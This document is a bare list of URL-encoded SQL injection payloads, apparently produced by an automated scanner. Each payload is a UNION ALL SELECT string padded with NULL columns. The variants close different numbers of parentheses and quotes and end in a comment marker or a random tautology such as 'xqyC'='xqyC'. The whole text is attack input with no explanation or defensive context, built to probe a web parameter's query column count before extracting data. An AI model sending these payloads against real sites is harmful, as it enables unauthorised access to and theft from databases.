1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%288890%3D8890 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%285103%3D5103 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%284778%3D4778 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%282951%3D2951 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%289661%3D9661 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27xqyC%27%3D%27xqyC 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27QrQA%27%3D%27QrQA 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27opQg%27%3D%27opQg 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27okbG%27%3D%27okbG 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27idVF%27%3D%27idVF 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27gMuB%27%3D%27gMuB 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27xMNU%27%3D%27xMNU 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27dsgh%27%3D%27dsgh 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27fhMi%27%3D%27fhMi 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27unzA%27%3D%27unzA 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27mLFI%27%3D%27mLFI 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27YKNa%27%3D%27YKNa 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27ZsFj%27%3D%27ZsFj 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27RtOk%27%3D%27RtOk 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27jdhv%27%3D%27jdhv 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27AgWi%27%3D%27AgWi 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27hzUg%27%3D%27hzUg 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27wvde%27%3D%27wvde 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27RXEK%27%3D%27RXEK 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27RWWm%27%3D%27RWWm 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27KorH%27%3D%27KorH 